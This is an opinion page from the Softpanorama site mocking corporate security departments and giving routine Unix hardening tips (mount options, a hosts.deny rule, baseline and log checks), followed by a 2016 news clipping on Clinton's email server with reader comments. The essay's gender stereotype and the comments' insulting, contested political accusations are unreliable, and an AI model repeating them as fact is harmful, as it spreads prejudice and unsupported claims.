Softpanorama
May the source be with you, but remember the KISS principle ;-)


Potemkin Villages of Computer Security

News Slightly Skeptical View on Enterprise Unix Administration Recommended Links Big Uncle is Watching You Privacy is Dead – Get Over It Cloud providers as intelligence collection hubs Tutorials Articles
"Softpanorama laws of security" An observation about corporate security departments Solaris Security Red Hat security Suse Security Managing AIX logs AIX security Hardening
Classic Open Source Security Tools Perl Scripts Integrity Checkers Port Scanners Logs Security & Integrity Syslog analyzers Syslog Anomaly Detection Analyzers eMail Security
Identity theft Intrusion detection Audit and Hardening Firewalls Network Security DB_security Top Vulnerabilities In Linux Environment Nephophobia: avoiding clouds
Security Certifications CISSP Certification DNS Security Important Government publications Hype Sysadmin Horror Stories Humor Etc


"Just as in the private sector, many federal agencies are reluctant to make the investments required in this area [of computer security] because of limited budgets, lack of direction and prioritization from senior officials, and general ignorance of the threat."

-- Statement of Gary R. Bachula, Acting Under Secretary for Technology, Department of Commerce, before House Science Subcommittee on Technology, June 19, 1997


Introduction

Work in a large organization tends to expand uncontrollably to fill all the time available to those assigned to perform it and to consume all the resources assigned. This is especially true of security departments, which are often unable to do any useful work and replace it with an imitation of activity in the form of various policies and checklists.

In other words, Parkinson's law is perfectly applicable. Parkinson's own example is very relevant here: the British Colonial Office reached its largest staff, and moved into a larger and plusher building, after Britain had lost its colonies. The example translates directly to the post-Snowden, post-CryptoLocker situation in security.

The horse has left the barn, but security departments are now better staffed and perform more useless work, creating additional load on other parts of IT and on end users, which lowers the profitability of the company.

In other words, we need to accept that any computer connected to a network is an insecure computer; only the degree of insecurity varies. So all the recent fuss about, for example, a particular SSL vulnerability should be treated with the skepticism it deserves. Subtract one vulnerability from an effectively infinite supply of them and the supply remains effectively infinite.

The key decisions that affect security in a large organization are made by system architects, not by anybody else. The security group generally plays the role of night cleaners in a supermarket, and its members are often about equally clueless ;-). Most activity outside architecture-related issues belongs to the "imitation of activity" that Parkinson's law describes. And while 80% of it is useless, of that 80% approximately 20% is definitely harmful. As Talleyrand used to say: first and foremost, avoid excessive zeal.

As of today, the quote from Gary R. Bachula above does not stand the test of time. The main reason is the NSA, which was definitely not constrained by a limited budget. But "lack of direction and prioritization from senior officials" as well as "ignorance" (not so much "ignorance of the threat" as the general corporate and military-style ignorance of the brass ;-) are still with us. So a lot of money nationwide is wasted on computer security. But computer security is just one part of general security and moves in sync with higher-level priorities such as protection of the elite. Edward Snowden's revelations did shatter some myths, as it is now clear that a powerful government organization has been working to undermine the security of the Internet (NSA Inside the FIVE-EYED VAMPIRE SQUID of the INTERNET • The Register):

Everything about the safety of the internet as a common communication medium has been shown to be broken. As with the banking disasters of 2008, the crisis and damage created - not by Snowden and his helpers, but by the unregulated and unrestrained conduct the leaked documents have exposed - will last for years if not decades.

... ... ...

The NSA's explicit objective is to weaken the security of the entire physical fabric of the net. One of its declared goals is to "shape the worldwide commercial cryptography market to make it more tractable to advanced cryptanalytic capabilities being developed by the NSA", according to top secret documents provided by Snowden.

Profiling the global machinations of merchant bank Goldman Sachs in Rolling Stone in 2009, journalist Matt Taibbi famously characterized them as operating "everywhere ... a great vampire squid wrapped around the face of humanity, relentlessly jamming its blood funnel into anything that smells like money”.

The NSA, with its English-speaking "Five Eyes" partners (the relevant agencies of the UK, USA, Australia, New Zealand and Canada) and a hitherto unknown secret network of corporate and government partners, has been revealed to be a similar creature. The Snowden documents chart communications funnels, taps, probes, "collection systems" and malware "implants" everywhere, jammed into data networks and tapped into cables or onto satellites.

Security in the large corporate environment attracts energetic know-nothings

At the corporate level the state of security is even more questionable than in government. Security in the large corporate environment attracts energetic know-nothings. In some organizations it also serves as a dumping ground for managers who proved useless in their assigned function but who, for some reason, are difficult or impossible to get rid of. I know of a case where a female sociopath was exiled into security because the organization was afraid she would exploit her gender in a lawsuit if she were terminated (and this idea of using gender as a bullet-proof vest by a female sociopath is more common than people realize). So there is always a danger that security in a particular organization is just window dressing performed by people more concerned with their careers, unable and unwilling to understand the real challenges facing the organization and its IT systems.


Businesses used to be conservative and more realistic, as they need to spend real money on security products. Still, it is in security that snake-oil salesmen have their most stunning successes. Even as the mass media fret over everything from hacker threats to cyber-terrorism and cover Anonymous exploits as if they were some three-letter-agency operation (which they might be ;-), the majority of companies are reluctant to spend too much money on security, yet still periodically blunder into acquiring some questionable and expensive product. Fashion rules, and many corporations adopt some variant of the policy "Nobody was ever fired for buying IBM" ;-). Most (or at least some) people know that the lion's share of those expenses will be completely wasted, but being politically correct is definitely more important. Voicing opposition to some brain-dead security initiative requires courage, a trait completely eliminated by adverse selection even at the middle levels of the corporate hierarchy.

A full 40% of IT managers recently surveyed by IDC cite IT security as their No. 1 priority (being politically correct helps). But fewer than 10% want to increase their security budgets (being slightly more realistic does not hurt either ;-).

At the end of the day, most additional security measures neither save money nor generate revenue. The most effective measures are usually related to the architecture of the datacenter and the topology of the network, and require little or no additional investment. Moreover, the measures that do get implemented are often useless or even harmful (Potemkin villages), because other steps taken elsewhere undermine them and render them useless.

We should understand that 80% of enterprise security is actually a byproduct of sound architecture and other technical decisions (for example, using Linux instead of Windows, or Solaris instead of Linux). In many cases moving off the most popular brand of OS or application raises security to a much higher level (via obscurity, and there is no shame in that) than paying top dollar to some Fortune 100 company to send over a couple of clueless or semi-clueless consultants who supposedly can fix the problems that the latest attack revealed in an infrastructure they do not understand :-).

And a lot of security consulting activity is simply a scam. As SOX compliance efforts have shown to a surprised world, the USA has the dubious advantage of having the most corrupt IT consultants by a wide margin. In retrospect, those SOX compliance efforts were such a blatant rip-off that most of the firms involved should probably have shared the fate of Arthur Andersen.

In the case of consultants it can also lead to the decision to buy and install YAPUST ("yet another pretty useless security tool"). For example, network IDS are fashionable now, but in most cases they produce so many false positives that after a while all warnings are safely ignored and/or the most useful (but noisy) rules are simply disabled ;-). Network IPS are mostly harmful and are better avoided unless the organization has top guns in its networking group (in which case the question arises why they should be controlled by the security group instead of working on the larger task of troubleshooting network problems). And senior management still believes that the IDS/IPS is in place and "the company is protected"... See also "Softpanorama laws of security".

Actually, a semi-forgotten network IDS sensor is a pretty benign example. "Security über alles" types can do a lot of damage to productivity without any real improvement in security. IPS is only one of many ways to harm the company. In some companies hidden sadists somehow become firewall administrators :-(.

Still, there are a few bright spots. The first is open source security tools. They are free, and some of them are as good as, or even better and more flexible than, their commercial counterparts. The source code is available, so they can be studied and modified to better suit the purposes of a particular organization. That does not mean there are no useless, badly written open source security tools and scripts. But at least you can select the best available and try them.

Linux, and Unix in general, also have some built-in mechanisms that help achieve security. For example, partitions can be mounted so that SUID binaries on them are ignored or, in stricter fashion, so that nothing on them can be executed at all. Suse has an interesting and very powerful subsystem called AppArmor. Virtual machines can also be used as a powerful security mechanism: they can be made disposable which, unless the VM layer itself is breached, excludes the possibility of tampering with executables and config files.
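On Linux, for instance, these mount restrictions can be expressed in /etc/fstab; the device names and mount points below are purely illustrative:

```
# /etc/fstab (illustrative): ignore SUID bits and device files on
# user-writable filesystems; additionally refuse to execute anything on /tmp
/dev/sda7   /tmp    ext4   nosuid,noexec,nodev   0 2
/dev/sda8   /home   ext4   nosuid,nodev          0 2
```

The same options can be applied to a live system without a reboot, e.g. mount -o remount,nosuid,noexec /tmp.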

Not deploying such built-in mechanisms is, in some cases, as close to negligence as one can get. The second bright spot is security training, together with some useful web resources, both government and commercial (CERT, the NIST National Checklist Program, SANS, SecurityFocus (which hosts the Bugtraq list), searchSecurity, etc.).

Security certification can also be useful, if you consider it not an end in itself but a first step. For additional references see other pages on this site, including my Solaris Security page and Security certification page. Security training for system and network administrators can substantially boost the level of security of information systems with little or no additional spending on packages. The importance of education, and of a realistic assessment of the security situation and needs in a corporate environment, is one reason I created this page. Not that I have any illusions about any particular security certification ;-). Still, there are differences between certifications. I think the Red Hat Certified Security Specialist (RHCSS), as well as the similar Solaris certification, is useful, while the CISSP Certification is mostly window dressing (and with its annual fee is more like a scam). Here is the definition of the RHCSS certification (Red Hat Certified Security Specialist (RHCSS)):

A Red Hat® Certified Security Specialist (RHCSS) is a Red Hat Certified Engineer (RHCE®) whose status is current and who has earned the following Red Hat Certificates of Expertise:

Note: The Red Hat Certificate of Expertise in Server Hardening may be substituted for either the Red Hat Certificate of Expertise in Security: Network Services or Red Hat Certificate of Expertise in Directory Services and Authentication but not both.

That is why it is surprising to see that relatively few companies are making investments to ensure that their IT teams know how to secure their network and technology infrastructures, despite all the attention surrounding security after the latest rounds of worms. It has become clear that a typical Windows desktop or server can be penetrated by hijacking the vendor and application patch delivery channels (and that is applicable to any OS with a vendor patch channel, although on Linux you can at least recompile patches from source). That does not mean you should not use Windows desktops or servers, but you should think twice before keeping any valuable information on them in unencrypted form. Unix is a better platform security-wise, but it too is vulnerable to a determined effort. Trusted Solaris probably has the best defense mechanisms of any general-purpose OS and should be considered for a large corporate environment if the security of data is really critical. Fully encrypted network channels also provide some level of security.

But it is important to remember that security is only as good as the weakest link. And often the weakest link is the qualification of the people responsible for security (which means that in an organization where security is of paramount importance, these issues should be delegated to system architects, as the most qualified specialists on the floor, not pigeonholed into a separate, technically weak department).

According to the InformationWeek Global Information Security Survey, fielded by PricewaterhouseCoopers, only 27% of U.S. companies have conducted security training for system and network administrators. That statistic is only slightly better than the one in four companies around the globe (the study reached 8,100 people in 50 countries) that have conducted such training. Note that many security training courses are actually scams and provide zero or even negative value. That is why self-education is so important, although it is of course preferable to get the fundamentals first.

How to defend yourself from an overzealous corporate security department

The security department in a large corporation is often staffed with people who would be useless in any department, and who become really harmful in this new role. One typical case is the enthusiastic "know-nothing" who, after moving to the security department, almost instantly turns into a script kiddie, ready to test the latest and greatest exploits downloaded from the Internet on internal corporate infrastructure (aka production servers), seeing such activity as a sacred duty inherent in the newly minted "security specialist" role.

So let's discuss how to protect ourselves from these "institutionalized" hackers, who are often more clueless, and no less ambitious, than the typical teenage script kiddie (Wikipedia):

In a Carnegie Mellon report prepared for the U.S. Department of Defense in 2005, script kiddies are defined as

"The more immature but unfortunately often just as dangerous exploiter of security lapses on the Internet. The typical script kiddy uses existing and frequently well known and easy-to-find techniques and programs or scripts to search for and exploit weaknesses in other computers on the Internet—often randomly and with little regard or perhaps even understanding of the potentially harmful consequences."

In this case you need to think about some defenses. Enabling a firewall on an internal server is probably overkill and might get you into hot water quicker than you can realize the consequences of such a conversion. But enabling TCP wrappers can help cut off the oxygen of overzealous "know-nothings", who are typically able to operate only from a dozen or so IP addresses (and your friends in the networking department can help ensure this arrangement ;-).

The simplest approach is to list in /etc/hosts.deny the services that caused problems in previous scan attempts. For example, an FTP daemon sometimes crashes when subjected to the sequence of packets that makes up an exploit; the HP-UX version of wu-ftpd is probably one of the weakest in this respect. Listing in /etc/hosts.deny the hosts from which the exploits are run can help. One thing you do need to ensure is that the particular daemon is compiled with TCP wrappers support (which is the case for vsftpd and wu-ftpd), or is run via xinetd on Linux and Solaris, or via tcpd on other Unixes.

Including SSH and telnet may also be helpful, as it blocks the possibility of exploiting some unpatched servers: even after an attacker inserts a new entry into /etc/passwd or does something similar, it remains impossible to log in from their addresses.
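A minimal sketch of such a hosts.deny, assuming the in-house scanners sit on a single /24 subnet; the addresses and the list of services are illustrative:

```
# /etc/hosts.deny -- refuse wrapped services to the scanners' subnet.
# A trailing dot in TCP wrappers syntax matches the whole address prefix.
# Make sure /etc/hosts.allow contains no blanket "ALL: ALL": it is
# consulted first and would override these entries.
vsftpd:     10.10.5.
sshd:       10.10.5.
in.telnetd: 10.10.5.
```

Clients from that subnet are refused before the daemon processes any protocol data, which is exactly what blunts crash-inducing scans.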

Another useful measure is creating a baseline of /etc and several other vital directories (/root and the cron files). A simple script comparing the current state with the baseline is useful not only against those jerks, but also provides important information about the actions of your co-workers, who sometimes make changes and forget to notify the other people administering the server.
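Such a baseline check can be sketched in a few lines of shell using checksums; the paths and mail address in the comments are illustrative, not part of any standard tool:

```shell
#!/bin/sh
# Baseline integrity check: record checksums of a directory tree once,
# then report any added, removed, or modified files on later runs.

make_baseline () {
    # $1 = directory to index, $2 = baseline file to write
    find "$1" -type f -exec md5sum {} + 2>/dev/null | sort -k 2 > "$2"
}

check_baseline () {
    # $1 = directory, $2 = baseline file; prints the differences and
    # returns non-zero if anything has drifted from the baseline
    current=$(mktemp)
    find "$1" -type f -exec md5sum {} + 2>/dev/null | sort -k 2 > "$current"
    diff "$2" "$current"
    status=$?
    rm -f "$current"
    return $status
}

# Typical use from cron (illustrative):
#   make_baseline /etc /var/adm/etc.baseline   # once, on a known-good system
#   check_baseline /etc /var/adm/etc.baseline || mailx -s "/etc drift" you@example.com
```

This is deliberately crude compared to a real integrity checker such as Tripwire or AIDE, but it is transparent, has no dependencies, and is easy to adapt to /root and the cron files as well.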

And last but not least, new, unique entries in the output of the last command should be mailed to you within an hour. The same goes for new, unique entries in /var/adm/messages or /var/log/messages. Servers in a corporate environment mostly perform dull, repetitive tasks, and one week of logs serves as an excellent baseline of what to expect from a server. Any messages that are substantially different should generate a report.
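The "report only what is new" idea can be sketched with a file of already-seen lines and grep; the file names and mail address are illustrative:

```shell
#!/bin/sh
# Report log lines never seen before: keep a file of already-seen lines
# and print only the entries that do not appear in it.

report_new_lines () {
    # $1 = current log file, $2 = file of lines already seen
    touch "$2"
    # -F fixed strings, -x whole-line match, -v invert, -f pattern file:
    # drop every line that exactly matches a previously seen line
    grep -Fxvf "$2" "$1" | sort -u
}

# Typical hourly cron use, for syslog or the output of last (illustrative):
#   report_new_lines /var/log/messages /var/adm/messages.seen > /tmp/new.$$
#   [ -s /tmp/new.$$ ] && mailx -s "new syslog entries" you@example.com < /tmp/new.$$
#   sort -u /var/log/messages > /var/adm/messages.seen
```

In practice you would first strip volatile fields (timestamps, PIDs) with sed or awk before comparing, so that only genuinely new message patterns are reported; that refinement is left out of this sketch.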

Dr. Nikolai Bezroukov




NEWS CONTENTS

Old News ;-)

[Jan 29, 2016] US government finds top secret information in Clinton emails

Notable quotes:
"... Oh, but it is serious. The material is/was classified. It just wasn't marked as such. Which means someone removed the classified material from a separate secure network and sent it to Hilary. We know from her other emails that, on more than one occasion, she requested that that be done. ..."
"... fellow diplomats and other specialists said on Thursday that if any emails were blatantly of a sensitive nature, she could have been expected to flag it. "She might have had some responsibility to blow the whistle," said former Ambassador Thomas Pickering, "The recipient may have an induced kind of responsibility," Pickering added, "if they see something that appears to be a serious breach of security." ..."
"... Finally whether they were marked or not the fact that an electronic copy resided on a server in an insecure location was basically like her making a copy and bringing it home and plunking it in a file cabinet... ..."
"... In Section 7 of her NDA, Clinton agreed to return any classified information she gained access to, and further agreed that failure to do so could be punished under Sections 793 and 1924 of the US Criminal Code. ..."
"... The agreement considers information classified whether it is "marked or unmarked." ..."
"... According to a State Department regulation in effect during Clinton's tenure (12 FAM 531), "classified material should not be stored at a facility outside the chancery, consulate, etc., merely for convenience." ..."
"... Additionally, a regulation established in 2012 (12 FAM 533.2) requires that "each employee, irrespective of rank must certify" that classified information "is not in their household or personal effects." ..."
"... As of December 2, 2009, the Foreign Affairs Manual has explicitly stated that "classified processing and/or classified conversation on a PDA is prohibited." ..."
"... Look, Hillary is sloppy about her affairs of state. She voted with Cheney for the Iraq disaster and jumped in supporting it. It is the greatest foreign affair disaster since Viet Nam and probably the greatest, period! She was a big proponent of getting rid of Khadaffi in Libya and now we have radical Islamic anarchy ravaging the failed state. She was all for the Arab Spring until the Muslim Brotherhood was voted into power in Egypt....which was replaced by yet another military dictatorship we support. And she had to have her own private e-mail server and it got used for questionable handling of state secrets. This is just Hillary being Hillary........ ..."
"... Its no secret that this hysterically ambitious Clinton woman is a warmonger and a hooker for Wall Street . No need to read her e-mails, just check her record. ..."
"... What was exemplary about an unnecessary war, a dumbass victory speech three or so months into it, the President's absence of support for his CIA agent outed by his staff, the President's German Chancellor shoulder massage, the use of RNC servers and subsequently "lost" gazillion emails, doing nothing in response to Twin Towers news, ditto for Katrina news, the withheld information from the Tillman family, and sanctioned torture? ..."
"... Another point that has perhaps not been covered sufficiently is the constant use of the phrase "unsecured email server" - which is intentionally vague and misleading and was almost certainly a phrase coined by someone who knows nothing about email servers or IT security and has been parroted mindlessly by people who know even less and journalists who should know better. ..."
"... Yet the term "unsecured" has many different meanings and implications - in the context of an email server it could mean that mail accounts are accessible without authentication, but in terms of network security it could mean that the server somehow existed outside a firewall or Virtual Private Network or some other form of physical or logical security. ..."
"... It is also extremely improbable that an email server would be the only device sharing that network segment - of necessity there would at least be a file server and some means of communicating with the outside world, most likely a router or a switch, which would by default have a built-in hardware firewall (way more secure than a software firewall). ..."
"... Anything generated related to a SAP is, by it's mere existence, classified at the most extreme level, and everyone who works on a SAP knows this intimately and you sign your life away to acknowledge this. ..."
"... yeah appointed by Obama...John Kerry. His state department. John is credited on both sides of the aisle of actually coming in and making the necessary changes to clean up the administrative mess either created or not addressed by his predecessor. ..."
"... Its not hard to understand, she was supposed to only use her official email account maintained on secure Federal government servers when conducting official business during her tenure as Secretary of State. This was for three reasons, the first being security the second being transparency and the third for accountability. ..."
"... You need to share that one with Petraeus, whos career was ruined and had to pay 100k in fines, for letting some info slip to his mistress.. ..."
"... If every corrupt liar was sent to prison there'd be no one left in Washington, or Westminster and we'd have to have elections with ordinary people standing, instead of the usual suspects from the political class. Which, on reflection, sounds quite good ! ..."
"... It's a reckless arrogance combined with the belief that no-one can touch her. If she does become the nominee Hillary will be an easy target for Trump. It'll be like "shooting fish in a barrel". ..."
"... It is obvious that the Secretary of State and the President should be communicating on a secure network controlled by the federal government. It is obvious that virtually none of these communications were done in a secure manner. Consider whether someone who contends this is irrelevant has enough sense to come in out of the rain. ..."
www.theguardian.com

The Obama administration confirmed for the first time on Friday that Hillary Clinton's unsecured home server contained some of the US government's most closely guarded secrets, censoring 22 emails with material demanding one of the highest levels of classification. The revelation comes just three days before the Iowa presidential nominating caucuses in which Clinton is a candidate.


jrhaddock -> MtnClimber 29 Jan 2016 23:04

Oh, but it is serious. The material is/was classified. It just wasn't marked as such. Which means someone removed the classified material from a separate secure network and sent it to Hilary. We know from her other emails that, on more than one occasion, she requested that that be done.

And she's not just some low level clerk who doesn't understand what classified material is or how it is handled. She had been the wife of the president so is certainly well aware of the security surrounding classified material. And then she was Sec of State and obviously knew what kind of information was classified. So to claim that the material wasn't marked, and therefore she didn't know it was classified, is simply not credulous.

Berkeley2013 29 Jan 2016 22:46

And Clinton had a considerable number of unvetted people maintain and administer her communication system. The potential for wrong doing in general and blackmail from many angles is great.

There's also the cost of this whole investigation. Why should US taxpayers have to pick up the bill?

And the waste of good personnel time---a total waste...

Skip Breitmeyer -> simpledino 29 Jan 2016 22:29

In one sense you're absolutely right- read carefully this article (and the announcement leading to it) raises at least as many questions as it answers, period. On the other hand, those ambiguities are certain not to be resolved 'over-the-weekend' (nor before the first votes are cast in Iowa) and thus the timing of the thing could not be more misfortunate for Ms. Clinton, nor more perfect for maximum effect than if the timing had been deliberately planned. In fact I'm surprised there aren't a raft of comments on this point. "Confirmed by the Obama administration..."? Who in the administration? What wing of the administration? Some jack-off in the justice dept. who got 50,000 g's for the scoop? The fact is, I'm actually with Bernie over Hilary any day, but I admit to a certain respect for her remarkable expertise and debate performances that have really shown the GOP boys to be a bunch of second-benchers... And there's something a little dirty and dodgy that's gone on here...

Adamnoggi dusablon 29 Jan 2016 22:23

SAP does not relate to To the level of classification. A special access program could be at the confidential level or higher dependent upon content. Special access means just that, access is granted on a case by case basis, regardless of classification level .


Gigi Trala La 29 Jan 2016 22:17

She is treated with remarkable indulgence. Anywhere with a sense of accountability she will be facing prosecution, and yet here she is running for even higher office. In the middle of demonstrating her unfitness.


eldudeabides 29 Jan 2016 22:15

Independent experts say it is highly unlikely that Clinton will be charged with wrongdoing, based on the limited details that have surfaced up to now and the lack of indications that she intended to break any laws.

since when has ignorance been a defence?


nataliesutler UzzDontSay 29 Jan 2016 22:05

Yes Petraeus did get this kind of scrutiny even though what he did was much less serious that what Clinton did. this isn't about a rule change. And pretending it is isn't going to fool anyone.


Sam3456 kattw 29 Jan 2016 21:18

Thats a misunderstanding on your part First lets look at Hillary's statement in March:

"I did not email any classified material to anyone on my email. There is no classified material. So I'm certainly well aware of the classification requirements and did not send classified material."

She later adjusted her language to note that she never sent anything "marked" classified. So already some Clinton-esque word parsing

And then what people said who used to do her job:

fellow diplomats and other specialists said on Thursday that if any emails were blatantly of a sensitive nature, she could have been expected to flag it.
"She might have had some responsibility to blow the whistle," said former Ambassador Thomas Pickering, "The recipient may have an induced kind of responsibility," Pickering added, "if they see something that appears to be a serious breach of security."

It is a view shared by J. William Leonard, who between 2002 and 2008 was director of the Information Security Oversight Office, which oversees the government classification system. He pointed out that all government officials given a security clearance are required to sign a nondisclosure agreement, which states they are responsible if secrets leak – whether the information was "marked or not."

Finally whether they were marked or not the fact that an electronic copy resided on a server in an insecure location was basically like her making a copy and bringing it home and plunking it in a file cabinet...

beanierose -> dusablon 29 Jan 2016 21:08

Yeah - I just don't understand what Hillary is actually accused of doing / or not doing in Benghazi. Was it that they didn't provide support to Stevens - (I think that was debunked) - was it that they claimed on the Sunday talk shows that the video was responsible for the attack (who cares). Now - I can think of an outrage - President Bush attacking Iraq on the specious claim that they had WMD - that was a lie/incorrec/incompetence and it cost ~7000 US and 200K to 700K Iraqi lives. Now - there's a scandal.

Stephen_Sean -> elexpatrioto 29 Jan 2016 21:07

The Secretary of State is an "original classifier" of information. The individual holding that office is responsible to recognize whether information is classified and to what level regardless if it is marked or not. She should have known. She has no true shelter of ignorance here.

Stephen_Sean 29 Jan 2016 21:00

The Guardian is whistling through the graveyard. The FBI is very close to a decision to recommend an indictment to the DOJ. At that point is up to POTUS whether he thinks Hillary is worth tainting his entire Presidency to protect by blocking a DOJ indictment. His responsibility as an outgoing President is to do what is best for his party and to provide his best attempt to get a Democrat elected. I smell Biden warming up in the bullpen as an emergency.

The last thing the DNC wants is a delay if their is going to be an indictment. For an indictment to come after she is nominated would be an unrecoverable blow for the Democrats. If their is to be an indictment its best for it to come now while they can still get Biden in and maintain their chances.

Sam3456 29 Jan 2016 20:57

In Section 7 of her NDA, Clinton agreed to return any classified information she gained access to, and further agreed that failure to do so could be punished under Sections 793 and 1924 of the US Criminal Code.

According To § 793 Of Title 18 Of The US Code, anyone who willfully retains, transmits or causes to be transmitted, national security information, can face up to ten years in prison.

According To § 1924 Of Title 18 Of The US Code, anyone who removes classified information " with the intent to retain such documents or materials at an unauthorized location," can face up to a year in prison.

The agreement considers information classified whether it is "marked or unmarked."

According to a State Department regulation in effect during Clinton's tenure (12 FAM 531), "classified material should not be stored at a facility outside the chancery, consulate, etc., merely for convenience."

Additionally, a regulation established in 2012 (12 FAM 533.2) requires that "each employee, irrespective of rank must certify" that classified information "is not in their household or personal effects."

As of December 2, 2009, the Foreign Affairs Manual has explicitly stated that "classified processing and/or classified conversation on a PDA is prohibited."

kus art 29 Jan 2016 20:54

I'm assuming that the censored emails reveal activities that the US government is into that are way more corrupt, insidious and venal than the emails already exposed, which says a lot already...

Profhambone -> Bruce Hill 29 Jan 2016 20:53

Look, Hillary is sloppy about her affairs of state. She voted with Cheney for the Iraq disaster and jumped in supporting it. It is the greatest foreign affairs disaster since Vietnam, and probably the greatest, period! She was a big proponent of getting rid of Khadaffi in Libya, and now we have radical Islamic anarchy ravaging the failed state. She was all for the Arab Spring until the Muslim Brotherhood was voted into power in Egypt... which was replaced by yet another military dictatorship we support. And she had to have her own private e-mail server, and it got used for questionable handling of state secrets. This is just Hillary being Hillary...


PsygonnUSA 29 Jan 2016 20:44

Its no secret that this hysterically ambitious Clinton woman is a warmonger and a hooker for Wall Street . No need to read her e-mails, just check her record.


USfan 29 Jan 2016 20:41

Sorry to be ranting but what does it say about a country - in theory, a democracy - that is implicated in so much questionable business around the world that we have to classify mountains of communication as off-limits to the people, who are theoretically sovereign in this country?

We've all gotten quite used to this. In reality, it should freak us out much more than it does. I'm not naive about what national security requires, but my sense is the government habitually and routinely classifies all sorts of things the people of this country have every right to know.

Assuming this is still a democracy, which is perhaps a big assumption.


Raleighchopper -> Bruce Hill 29 Jan 2016 20:40

far Left sites like the Guardian:

LMAOROFL
Scott Trust Ltd board
https://en.wikipedia.org/wiki/Scott_Trust_Limited

FirthyB 29 Jan 2016 20:36

Hillary is in that class, along with Goldman Sachs, JP Morgan, Bush, Cheney etc.. who believe the rule of law only pertains to the little guys.


MooseMcNaulty -> dusablon 29 Jan 2016 20:28

The spying was illegal on a Constitutional basis. The Fourth Amendment protects our privacy and prevents unlawful search and seizure. The government getting free access to the contents of our emails seems the same as opening our mail, which is illegal without a court order.

The drone program is illegal based on the Geneva accords. We are carrying out targeted killings within sovereign nations, usually without their knowledge or consent, based on secret evidence that they pose a vaguely defined 'imminent threat'. It isn't in line with any international law, though we set that precedent long ago.


makaio -> USfan 29 Jan 2016 20:08

What was exemplary about an unnecessary war, a dumbass victory speech three or so months into it, the President's absence of support for his CIA agent outed by his staff, the President's German Chancellor shoulder massage, the use of RNC servers and subsequently "lost" gazillion emails, doing nothing in response to Twin Towers news, ditto for Katrina news, the withheld information from the Tillman family, and sanctioned torture?

Those were just starter questions. I'm sure I missed things.


Raleighchopper -> Popeia 29 Jan 2016 20:05

http://www.reuters.com/article/us-usa-politics-clinton-idUSN2540811420080326


Rowan Walters 29 Jan 2016 19:51

Another point that has perhaps not been covered sufficiently is the constant use of the phrase "unsecured email server" - which is intentionally vague and misleading and was almost certainly a phrase coined by someone who knows nothing about email servers or IT security and has been parroted mindlessly by people who know even less and journalists who should know better.

As an IT professional, I see the repeated use of a phrase like that as a red flag. It's what happens when people who don't know what they're talking about latch on to a phrase that sounds technical because it contains jargon: they use it to sound knowledgeable, but it doesn't actually mean anything unless the context is clear and unambiguous.

The phrase is obviously being repeated to convey the impression of supreme negligence - that sensitive state secrets were left defenceless and (gasp!) potentially accessible by anyone.

Yet the term "unsecured" has many different meanings and implications - in the context of an email server it could mean that mail accounts are accessible without authentication, but in terms of network security it could mean that the server somehow existed outside a firewall or Virtual Private Network or some other form of physical or logical security.

Does this term "unsecured" mean the data on the server was not password-protected, does it mean it was unencrypted, does it mean that it was totally unprotected (which is extremely unlikely even if it was installed by an ignorant Luddite given that any modern broadband modem is also a hardware firewall), and as for the "server" was it a physical box or a virtual server?

It is also extremely improbable that an email server would be the only device sharing that network segment - of necessity there would at least be a file server and some means of communicating with the outside world, most likely a router or a switch, which would by default have a built-in hardware firewall (way more secure than a software firewall).

And regarding the "unsecured" part, how was the network accessed?
There are a huge number of possibilities as to the actual meaning and on its own there is not enough information to deduce which - if any - is correct.

I suspect that someone who knows little to nothing about technology has invented this concept based on ignorance and a desire to imply malfeasance, because on its own it really is a nonsense term.


seanet1310 -> Wallabyfan 29 Jan 2016 19:37

Nope. Like it or not Manning deliberately took classified information, smuggled it out and gave it to foreign nationals.
Clinton it would appear mishandled classified material, at best she failed to realise the sensitive nature and at worst actively took material from controlled and classified networks onto an unsecured private network.


dusablon 29 Jan 2016 19:28

Classified material in the US falls into three levels: Confidential, Secret, and Top Secret. Those labels are not applied in a cavalier fashion. The release of TS information is considered a grave threat to the security of the United States.

Above these classification levels is what is as known as Special Access Program information, the release of which has extremely grave ramifications for the US. Access to SAP material is extremely limited and only granted after an extensive personal background investigation and only on a 'need to know' basis. You don't simply get a SAP program clearance because your employer thinks it would be nice to have, etc. In fact, you can have a Top Secret clearance and never get a special access program clearance to go with it.

For those of you playing at home, the Top Secret SAP material Hillary had on her server - the most critical material the US can have - was not simply 'upgraded' to classified in a routine bureaucratic exercise because it was previously unclassified.

Anything generated related to a SAP is, by its mere existence, classified at the most extreme level; everyone who works on a SAP knows this intimately, and you sign your life away to acknowledge it.

What the Feds did in Hillary's case in making the material on her home-based server Top Secret SAP was to bring those materials into what is known as 'accountability.'

That is, the material was always SAP material but it was just discovered outside a SAP lock-down area or secure system and now it must become 'accountable' at the high classification level to ensure it's protected from further disclosure.

Hillary and her minions have no excuse whatsoever for this intentional mishandling of this critical material and are in severe legal jeopardy no matter what disinformation her campaign puts out. Someone will or should go to prison. Period.

(Sorry for the length of the post)


Sam3456 -> Mark Forrester 29 Jan 2016 19:22

Yeah, appointed by Obama...John Kerry. His State Department. John is credited on both sides of the aisle with actually coming in and making the necessary changes to clean up the administrative mess either created or not addressed by his predecessor.

Within weeks of taking the position, JK implemented the OIG task force's recommendations to streamline the process and make State run more in line with other government organizations. I think John saw the "Sorry, it snowed, can't get you this info for a month" attitude for what it was and acted out of decency and fairness to the American people. I still think he looks like a hound and is a political opportunist, but you can't blame him for shenanigans here.


chiefwiley -> DoktahZ 29 Jan 2016 19:18

The messages were "de-papered" by the staff, stripping them from their forms and headings and then scanning and including the content in accumulations to be sent and stored in an unclassified system. Taking the markings off of a classified document does not render it unclassified. Adding the markings back onto the documents does not "declare" them classified. Their classified nature was constant.

If you only have an unsecured system, it should never be used for official traffic, let alone classified or special access traffic.

dusablon -> MtnClimber 29 Jan 2016 19:05

Give it up.

She used a private server deliberately to avoid FOIA requests, she deleted thousands of emails after they were requested, and the emails that remained contained Top Secret Special Access Program information, and it does not matter one iota whether or not that material was marked or whether or not it has been recently classified appropriately.


chiefwiley -> Exceptionalism 29 Jan 2016 19:04

18 USC § 793(f)

$250,000 and ten years.

dusablon -> MtnClimber 29 Jan 2016 19:00

False.

Anything related to a special access program is classified whether marked as such or not.

dalisnewcar 29 Jan 2016 18:58

You would figure that after all the lies of O'bomber, Democrats might wake up some. Apparently, they are too stupid to realize they have been duped, even after the entire middle class has been decimated and the wealth of the 1% has grown threefold under the man who has now bombed 7 countries. And you folks think Clinton, who personally destroyed Libya, is going to be honest with you and not do the same things he's done? Wake up, folks. You're banging your head against the same old wall.

fanUS -> MtnClimber 29 Jan 2016 18:46

She is evil, because she helped Islamic State to rise.


